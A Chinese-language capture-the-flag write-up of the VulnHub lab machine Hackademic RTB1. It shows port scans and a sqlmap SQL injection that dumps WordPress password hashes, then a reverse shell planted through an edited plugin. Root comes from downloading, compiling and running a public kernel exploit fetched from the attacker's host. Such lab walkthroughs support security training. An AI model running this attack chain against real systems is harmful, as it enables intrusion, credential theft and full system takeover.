HACKADEMIC: RTB1
HACKADEMIC: RTB1
https://www.vulnhub.com/entry/hackademic-rtb1,17/
扫描主机
# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:15:01]
$ nmap -sn 192.168.54.0/24
Nmap scan report for 192.168.54.8
Host is up (0.00057s latency).
nmap扫描
7.93 ( https://nmap.org ) at 2023-03-15 15:15 CST
Nmap scan report for 192.168.54.8
Host is up (0.00093s latency).
Not shown: 65515 filtered tcp ports (no-response), 18 filtered tcp ports (host-unreach)
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:16:26] C:1
$ sudo nmap -sT -sV -O -p22,80 192.168.54.8
[sudo] yunki 的密码:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-15 15:16 CST
Nmap scan report for 192.168.54.8
Host is up (0.00050s latency).
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.15 ((Fedora))
MAC Address: 00:0C:29:01:8A:4D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.22 - 2.6.36
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.37 seconds# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:16:40]
$ sudo nmap -sU -p22,80 192.168.54.8
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-15 15:16 CST
Nmap scan report for 192.168.54.8
Host is up (0.00050s latency).
PORT STATE SERVICE
22/udp filtered ssh
80/udp filtered http
MAC Address: 00:0C:29:01:8A:4D (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:16:55]
$ sudo nmap --script=vuln -p22,80 192.168.54.8
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-15 15:17 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.54.8
Host is up (0.00059s latency).PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
| http-enum:
|_ /icons/: Potentially interesting folder w/ directory listing
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-trace: TRACE is enabled
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-vuln-cve2011-3192:
| VULNERABLE:
| Apache byterange filter DoS
| State: VULNERABLE
| IDs: BID:49303 CVE:CVE-2011-3192
| The Apache web server is vulnerable to a denial of service attack when numerous
| overlapping byte ranges are requested.
| Disclosure date: 2011-08-19
| References:
| https://www.securityfocus.com/bid/49303
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
| https://seclists.org/fulldisclosure/2011/Aug/175
|_ https://www.tenable.com/plugins/nessus/55976
|_http-dombased-xss: Couldn't find any DOM based XSS.
MAC Address: 00:0C:29:01:8A:4D (VMware)Nmap done: 1 IP address (1 host up) scanned in 170.89 seconds
web渗透
目录扫描
# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:16:08]
$ dirb http://192.168.54.8/ -----------------
DIRB v2.22
By The Dark Raver
-----------------START_TIME: Wed Mar 15 15:19:13 2023
URL_BASE: http://192.168.54.8/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt-----------------GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.54.8/ ----
+ http://192.168.54.8/cgi-bin/ (CODE:403|SIZE:288)
+ http://192.168.54.8/index.html (CODE:200|SIZE:1475)
+ http://192.168.54.8/phpmyadmin (CODE:403|SIZE:290)
+ http://192.168.54.8/phpMyAdmin (CODE:403|SIZE:290) -----------------
END_TIME: Wed Mar 15 15:19:24 2023
DOWNLOADED: 4612 - FOUND: 4# 他告诉我们target是这个http://192.168.54.8/Hackademic_RTB1/
在dirb扫一下这个目录
# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:41:06]
$ dirb http://192.168.54.8/Hackademic_RTB1/-----------------
DIRB v2.22
By The Dark Raver
-----------------START_TIME: Wed Mar 15 15:41:20 2023
URL_BASE: http://192.168.54.8/Hackademic_RTB1/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt-----------------GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.54.8/Hackademic_RTB1/ ----
+ http://192.168.54.8/Hackademic_RTB1/index.php (CODE:500|SIZE:1881)
==> DIRECTORY: http://192.168.54.8/Hackademic_RTB1/wp-admin/
==> DIRECTORY: http://192.168.54.8/Hackademic_RTB1/wp-content/
==> DIRECTORY: http://192.168.54.8/Hackademic_RTB1/wp-images/
==> DIRECTORY: http://192.168.54.8/Hackademic_RTB1/wp-includes/
+ http://192.168.54.8/Hackademic_RTB1/xmlrpc.php (CODE:200|SIZE:42) ---- Entering directory: http://192.168.54.8/Hackademic_RTB1/wp-admin/ ----
+ http://192.168.54.8/Hackademic_RTB1/wp-admin/admin.php (CODE:302|SIZE:0)
+ http://192.168.54.8/Hackademic_RTB1/wp-admin/index.php (CODE:302|SIZE:0) -----------------
END_TIME: Wed Mar 15 15:41:44 2023
DOWNLOADED: 9224 - FOUND: 4
访问网页,发现192.168.54.8/Hackademic_RTB1/?cat=1
有sql注入,直接sqlmap跑。
sqlmap
# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:52:55]
$ sqlmap -u "192.168.54.8/Hackademic_RTB1/?cat=1" --current-db --batch current database: 'wordpress'# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:52:58]
$ sqlmap -u "192.168.54.8/Hackademic_RTB1/?cat=1" -D wordpress --tables --batchDatabase: wordpress
[9 tables]
+-------------------+
| wp_categories |
| wp_comments |
| wp_linkcategories |
| wp_links |
| wp_options |
| wp_post2cat |
| wp_postmeta |
| wp_posts |
| wp_users |
+-------------------+# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:53:01]
$ sqlmap -u "192.168.54.8/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users --columns --batchDatabase: wordpress
Table: wp_users
[22 columns]
+---------------------+---------------------+
| Column | Type |
+---------------------+---------------------+
| ID | bigint(20) unsigned |
| user_activation_key | varchar(60) |
| user_aim | varchar(50) |
| user_browser | varchar(200) |
| user_description | longtext |
| user_domain | varchar(200) |
| user_email | varchar(100) |
| user_firstname | varchar(50) |
| user_icq | int(10) unsigned |
| user_idmode | varchar(20) |
| user_ip | varchar(15) |
| user_lastname | varchar(50) |
| user_level | int(2) unsigned |
| user_login | varchar(60) |
| user_msn | varchar(100) |
| user_nicename | varchar(50) |
| user_nickname | varchar(50) |
| user_pass | varchar(64) |
| user_registered | datetime |
| user_status | int(11) |
| user_url | varchar(100) |
| user_yim | varchar(50) |
+---------------------+---------------------+# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:53:14]
$ sqlmap -u "192.168.54.8/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users -C user_nickname,user_pass,user_level --dump --batchDatabase: wordpress
Table: wp_users
[6 entries]
+---------------+---------------------------------------------+------------+
| user_nickname | user_pass | user_level |
+---------------+---------------------------------------------+------------+
| NickJames | 21232f297a57a5a743894a0e4a801fc3 (admin) | 1 |
| MaxBucky | 50484c19f1afdaf3841a0d821ed393d2 (kernel) | 0 |
| GeorgeMiller | 7cbb3252ba6b7e9c422fac5334d22054 (q1w2e3) | 10 |
| JasonKonnors | 8601f6e1028a8e8a966f6c33fcd9aec4 (maxwell) | 0 |
| TonyBlack | a6e514f9486b83cb53d8d932f9a04292 (napoleon) | 0 |
| JohnSmith | b986448f0bb9e5e124ca91d3d650f52c | 0 |
+---------------+---------------------------------------------+------------+
这里,根据字段的内容,我选取了比较重要的用户名,密码和等级等信息。这里可以发现GeorgeMille的权限最高,这里尝试使用该用户登录wp后台吧。访问这个http://192.168.54.8/Hackademic_RTB1/wp-admin/
,直接被重定向到登录页面。
通过浏览网页发现,这里可以编辑php,写一个反弹shell试试。
开启端口监听。访问http://192.168.54.8/Hackademic_RTB1/wp-content/plugins/hello.php
# yunki @ yunki in ~ [16:02:39]
$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.54.128] from (UNKNOWN) [192.168.54.8] 47172
bash: no job control in this shell
bash-4.0$ whoami
whoami
apache
权限提升
bash-4.0$ uname -a
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
bash-4.0$ uname -r
uname -r
2.6.31.5-127.fc12.i686
kali
# yunki @ yunki in ~/vulnhub/HackademicRTB1 [16:34:32]
$ searchsploit 2.6.3 | grep "Privilege Escalation"
Linux 2.6.30 < 2.6.36-rc8 - Reliable Datagram Sockets (RDS) Privilege Escalation (Metasploit) | linux/local/44677.rb
Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc5 - 'pipe.c' Local Privilege Escalation (3) | linux/local/9844.py
Linux Kernel 2.4.4 < 2.4.37.4 / 2.6.0 < 2.6.30.4 - 'Sendpage' Local Privilege Escalation (Metasploit) | linux/local/19933.rb
Linux Kernel 2.6.0 < 2.6.31 - 'pipe.c' Local Privilege Escalation (1) | linux/local/33321.c
Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Local Privilege Escalation | linux/local/40812.c
Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Local Privilege Escalation | linux_x86-64/local/15024.c
Linux Kernel 2.6.30 < 2.6.30.1 / SELinux (RHEL 5) - Local Privilege Escalation | linux/local/9191.txt
Linux Kernel 2.6.32 (Ubuntu 10.04) - '/proc' Handling SUID Privilege Escalation | linux/local/41770.txt
Linux Kernel 2.6.32 - 'pipe.c' Local Privilege Escalation (4) | linux/local/10018.sh
Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Escalation (1) | linux/local/25444.c
Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation | linux/local/15285.c
Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation | linux/local/15704.c
Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Local Privilege Escalation (1) | linux/local/18411.c
Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation (2) | linux/local/35161.c
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation (1) | linux_x86/local/15916.c
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Local Privilege Escalation (2) | linux/local/15944.c
Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) - 'CAN BCM' Local Privilege Escalation | linux/local/14814.c
Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation | linux_x86-64/local/15023.c
Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation | linux/local/17787.c
Linux Kernel < 2.6.37-rc2 - 'ACPI custom_method' Local Privilege Escalation | linux/local/15774.c
ReiserFS (Linux Kernel 2.6.34-rc3 / RedHat / Ubuntu 9.10) - 'xattr' Local Privilege Escalation | linux/local/12130.py
(好多啊,这里用了好多个都不行,最后使用Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation
成功了 TAT)
# yunki @ yunki in ~/vulnhub/HackademicRTB1 [16:36:03]
$ searchsploit -m 15285.c Exploit: Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege EscalationURL: https://www.exploit-db.com/exploits/15285Path: /usr/share/exploitdb/exploits/linux/local/15285.c
File Type: C source, ASCII text, with CRLF line terminatorsCopied to: /home/yunki/vulnhub/HackademicRTB1/15285.c# yunki @ yunki in ~/vulnhub/HackademicRTB1 [16:36:09]
$ php -S 0:80
[Wed Mar 15 16:36:16 2023] PHP 7.4.15 Development Server (http://0:80) started
靶机
bash-4.0$ wget http://192.168.54.128/15285.c
wget http://192.168.54.128/15285.c
--2023-03-15 01:59:35-- http://192.168.54.128/15285.c
Connecting to 192.168.54.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7155 (7.0K) [text/x-c]
Saving to: `15285.c.1'0K ...... 100% 618M=0s2023-03-15 01:59:35 (618 MB/s) - `15285.c.1' saved [7155/7155]bash-4.0$ gcc 15285.c -o 15285
gcc 15285.c -o 15285
bash-4.0$ chmod +x 15285
chmod +x 15285
bash-4.0$ ./15285
./15285
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...[+] Resolved security_ops to 0xc0aa19ac[+] Resolved default_security_ops to 0xc0955c6c[+] Resolved cap_ptrace_traceme to 0xc055d9d7[+] Resolved commit_creds to 0xc044e5f1[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...[+] Resolved security_ops to 0xc0aa19ac[+] Resolved default_security_ops to 0xc0955c6c[+] Resolved cap_ptrace_traceme to 0xc055d9d7[+] Resolved commit_creds to 0xc044e5f1[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...[+] Resolved security_ops to 0xc0aa19ac[+] Resolved default_security_ops to 0xc0955c6c[+] Resolved cap_ptrace_traceme to 0xc055d9d7[+] Resolved commit_creds to 0xc044e5f1[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
whoami
root
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00inet 127.0.0.1/8 scope host loinet6 ::1/128 scope host valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000link/ether 00:0c:29:01:8a:4d brd ff:ff:ff:ff:ff:ffinet 192.168.54.8/24 brd 192.168.54.255 scope global eth0inet6 fe80::20c:29ff:fe01:8a4d/64 scope link valid_lft forever preferred_lft forever
HACKADEMIC: RTB1相关推荐
- [靶机渗透笔记] HACKADEMIC: RTB1
靶机链接https://www.vulnhub.com/entry/hackademic-rtb1,17/ 确定靶机 扫描存活主机 sudo nmap -sP 192.168.200.129/24 扫 ...
- Kali(docker)之Hackademic靶场实战(一)启动靶场
目录 1.根据提示,创建目录 2.启动靶场 3.进入安装页面 1.根据提示,创建目录 根据提示执行命令 cd /tmp/git clone -b master https://github.com/H ...
- ORACLE HANDBOOK系列之十四:变化通知(Change Notification)
在App开发的过程中,有些数据访问频率很高但是数据变化不大,我们一般会让它驻留内存以提高访问性能,但是此种机制存在一个问题,那就是如何监测数据的变化,Oracle 10g中引入的 Change Not ...
- 各种Web漏洞测试平台
为什么80%的码农都做不了架构师?>>> Sqli Lab 支持报错注入.二次注入.盲注.Update注入.Insert注入.Http头部注入.二次注入练习等.支持GET和P ...
- web渗透测试 靶机系统 漏洞测试环境
本文总结了目前网络上比较流行的渗透测试演练系统,这些系统里面都提供了一些实际的安全漏洞,排名不分先后,各位安全测试人员可以亲身实践如何利用这个漏洞,同时也可以学习到漏洞的相关知识. DVWA (Dam ...
- Mac git 终端使用
终端有这个提示,这个按照命令 输入你的 git账号和邮箱就可以, 不然一直出这个提示 Your name and email address were configured automatically ...
- 淘宝店铺图片数据迁移核心代码
核心代码 using System; using System.Collections.Generic; using System.Linq; using System.Text; using Sys ...
- 干货|靶场|工具|字典 分享
字典集合 项目地址: https://github.com/epony4c/Exploit-Dictionary 网盘地址: 链接:https://pan.baidu.com/s/1GL2olkn0n ...
- Basic Linux Privilege Escalation
原文链接: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ Basic Linux Privilege Escal ...
最新文章
- 谈谈战双的战斗机制设计趋同
- vue 源码学习(一) 目录结构和构建过程简介
- ROS笔记(25) 自主探索SLAM
- java二分查找算法字符串数组_Java 算法——二分查找数组集合关键元素
- 关于重构中的“函数尽量小”的负作用
- vscode 不能运行h5c3代码_Golang安装与环境搭建并在VSCode里面输出HelloWord
- django中collectstatic的使用
- 【MAC】使用CHM查看JDK帮助文档【转载】
- 个人先进事迹如何写--注意三个关键词的把握
- keep T 不是 KG等级_Lifestyle | 做Keep没有动力?一周的健身计划都在这里了!
- android 语音自动分句,进行音频断句的自动拆分方法及系统与流程
- 为什么我Redis中key惊现“乱码”?
- ms-sql数据类型和access数据类型大全
- 软件测试中自上而下与自下而上的区别
- SCAU 2018新生赛 初出茅庐 全题解
- 数据结构·堆·完全二叉树
- java 图片检查_使用JAVA如何对图片进行格式检查以及安全检查处理
- 游戏搬砖是什么意思?
- 2020保研夏令营——无科研无竞赛的夏令营之旅
- 《C++ Templates》笔记 Chapter 12 Fundamentals in Depth-Chapter 13 Names in Templates